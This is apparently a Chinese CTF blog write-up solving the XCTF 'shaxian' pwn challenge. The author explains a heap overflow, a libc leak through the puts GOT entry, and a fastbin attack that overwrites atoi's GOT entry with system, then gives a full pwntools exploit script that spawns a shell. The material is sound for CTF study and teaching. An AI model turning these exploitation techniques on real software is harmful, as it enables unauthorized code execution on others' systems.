攻防世界 pwn 进阶 shaxian

最新推荐文章于 2023-07-15 20:11:40 发布
最新推荐文章于 2023-07-15 20:11:40 发布
阅读量238 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113915024
版权

安全

保护
在这里插入图片描述
先留下了地址跟电话。
在这里插入图片描述
点餐函数。
在这里插入图片描述结构大概是这样的
在这里插入图片描述然后点餐那里可以溢出

submit
在这里插入图片描述他这很有意思他这个程序记录你不停点餐的方式是在那个空间最后八个字节放进去了bss上地址本来有的东西,然后free之后再给它放回去,就是套娃的样子。但是我们能够溢出啊,我们之间可以控制它最后放在我们那个地方的地址,这不就好起来了嘛?

receipt
在这里插入图片描述

review
在这里插入图片描述
view循环着把东西都输出出来。

那么这道题大致的利用思路是什么,是通过溢出,把结构体最下面的那个指针改成got表的地址,然后就可以达到在输出函数输出的时候打印我们需要的地址。
有了地址之后我们还是利用溢出,从chunk0溢出到chunk1,修改fd,然后利用fastbin_attack,对存放结构体地址的那个地方进行攻击,当然我们需要进行伪造,将结构体地址覆盖成atoi的got表地址,然后改成system函数,从而get shell。

在这里插入图片描述在最后申请到fake_chunk之后通过这些代码来劫持got,利用的非常巧妙,先输入的是内容,把note地方写成atoi的got表地址,然后v0等于note,也就是等于的是atoi的got,然后往里面写many,这个时候你就把many输入的时候写system的地址就行。

#coding:utf8
from pwn import *
 
#r = remote('111.200.241.244',54867)
r = process("./shaxian")
elf = ELF('./shaxian')
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
ptr = 0x804B1C0
libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_i386/libc-2.23.so")
#libc = ELF("./32/libc-2.23.so")
context.log_level = "debug"

def add(count,content):
    r.sendlineafter('choose:','1')
    r.sendlineafter('5.Jianjiao',content)
    r.sendlineafter('How many?',count)
 
def delete():
    r.sendlineafter('choose:','2')
 
def show():
    r.sendlineafter('choose:','4')
 
r.sendlineafter('Your Address:','123')
fake_chunk = p32(0) + p32(0x31)
payload = 'd'*(0x100-0x10) + fake_chunk
r.sendlineafter('Your Phone number:',payload)
 
add('1','a') #0
add('1','b') #1
add('1','c') #2
delete()

payload = 'a'*0x20 + p32(puts_got-0x4)
#这里的puts_got - 0x4是因为申请到的空间前四个字节是many,这样就可以把puts_got里面的内容放到content之中。
#当然通过many也可以泄露,因为它输出的时候many也会输出出来。
#prev_size size fd
payload += p32(0) + p32(0x31) + p32(ptr-0x10) #chunk1
add('1',payload)
show()
r.recvuntil('* 1\n')
puts_addr = u32(r.recv(4))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']

print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)

print str(system_addr )
print str(system_addr - 0x100000000)

add('10','b') #chunk1
#申请堆块到ptr上方的假chunk处,将ptr指针覆盖为atoi的got地址,同时修改atoi的got表

add(str(system_addr - 0x100000000),'dddd' + p32(atoi_got))

#这个地方要注意,为什么输入的是地址减0x100000000,而不是直接输入地址就好
#可以试一下,str在转换的时候,把地址直接转换成了无符号整型
#但是在减去一个比自己打的数之后会变成负数
#那么虽然十六进制一样,差别就是你输入的是无符号整形,还是有符号的
#经过调试,atoi函数的核心是strtol函数,strtol函数的核心是strtol_internal
#它在处理无符号整数的时候当这个数字超过它的最大整数0x7fffffff,就会把数字设置成0x7fffffff
#所以在把地址输入无符号整数的话,返回的结果就是0x7fffffff

#getshell
r.sendline('/bin/sh')
 
r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn 进阶(3)
weixin_44113469的博客
02-07 183
0x01 Stack migration leave;ret; leave mov esp,ebp pop ebp ret pop eip if we deploy stack stack bss fake_ebp1 esp–> fake ebp1 mem is here/ fake_ebp2 read fake_fun leave_ret ebp–> fake_ebp2 mem is here control eip return to read fake_e
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 435
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该题利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
攻防世界PWNshaxian题解
seaaseesa的博客
02-09 652
shaxian 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 功能1存在溢出 free后没有清空指针 我们先创建链表三个节点,程序使用的是头插法,因此,当我们释放的时候,第一个节点最后释放,而当我们再申请同样大小的块时,由于fastbin的特性,第一个块就先被申请回来了,这样,我们溢出到节点2的结构体,覆盖指针为函数got表,就能泄露信息 #头插法建立链表,c...
攻防世界——进阶PWN:Mary_Morton
baidu_36110484的博客
06-14 409
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
pwn 进阶(2)
weixin_44113469的博客
02-07 361
pwn improve(2) 0x01 plan1(produce vulnerable program ) my important jop is to Debugger。 pwn1(20200315) this topic is anther lgd,the topic i produced before。 [key point]: 1.heap overlap 2.seccomp 3.rop 4.shellcode wp: there is a heap overlap in the add fun
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
2017湖湘杯pwn300
12-03
2017湖湘杯pwn300的题目,请大家自行下载。。。。。。
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 889
stack2 哈,我又回来了 这个题呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问题 这个时对数据进行...
攻防世界 pwn进阶pwn-200
Kni9hT's Blog
03-04 1718
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
攻防世界-PWN-shaxian-堆溢出与FastbinAttack
aptx4869_li的博客
07-15 327
攻防世界shaxian题目的解题思路
pwn-进阶-forgot
weixin_45971758的博客
08-19 1438
1.checksec先检查,开启的保护以及程序情况。 开启了NX(地址随机化保护) , 就意味着程序地址分布随机。 32位小段序,输入的变量数据在地址中的存放位置(安装小段序存放)。 2.静态调试(静态查看) 将文件拖入到 ida 32位,然后确定。 shift+F12看到程序出现的字符串,发现下面。 有./flag cat %s , 双击字符串并且看到了在.rodata 的存放位置,后面还有一个函数。 双击此函数,查看函数全部信息。 这样就看到了函数全貌。之后按F5(笔记本电脑键盘FN+F5),查
攻防世界 pwn 进阶 bufoverflow_a
yongbaoii的博客
03-13 430
保护一片绿。 菜单堆。 alloc delete fill show
CTF PWN特点:入门难、进阶难、精通难
IT_huanhuan的博客
05-24 1602
通过第1点中描述,在执行call sum的时候,会将sum 的下一条命令的执行地址0x8048438压入栈中,然后程序进入sum片段进行执行,此时,0x8048438地址就是sum函数的返回地址,即 return address。当执行到ret时,栈空间如下栈地址值0xffffceac0x8048438 # sum的下一条指令0xffffceb01 # a 的值0xffffceb42 # b 的值当执行完ret后,栈空间为。
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 387
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
菜鸟PWN进阶之堆基础
re1wn
01-04 6789
菜鸟PWN进阶之堆基础
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值